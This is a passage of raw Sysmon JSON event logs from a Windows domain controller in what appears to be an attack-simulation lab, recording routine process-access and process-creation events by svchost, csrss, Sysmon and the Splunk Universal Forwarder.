{"EventTime":"2020-08-01 07:01:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7576,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:01.668\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-132D-5F25-0000-001026980B00}\r\nTargetProcessId: 4400\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:01.668","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-132D-5F25-0000-001026980B00}","TargetProcessId":"4400","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7577,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:01.841\r\nProcessGuid: {E2A3D6B1-132D-5F25-0000-0010129B0B00}\r\nProcessId: 4388\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:01:01.841","ProcessGuid":"{E2A3D6B1-132D-5F25-0000-0010129B0B00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7578,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:01.840\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-132D-5F25-0000-0010129B0B00}\r\nTargetProcessId: 4388\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:01.840","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-132D-5F25-0000-0010129B0B00}","TargetProcessId":"4388","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7579,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:01.840\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-132D-5F25-0000-0010129B0B00}\r\nTargetProcessId: 4388\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:01.840","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-132D-5F25-0000-0010129B0B00}","TargetProcessId":"4388","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7580,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:01.840\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:01.840","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7581,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:01.840\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:01.840","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7582,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:01.840\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:01.840","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7583,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:01.840\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:01.840","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7584,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:01.840\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 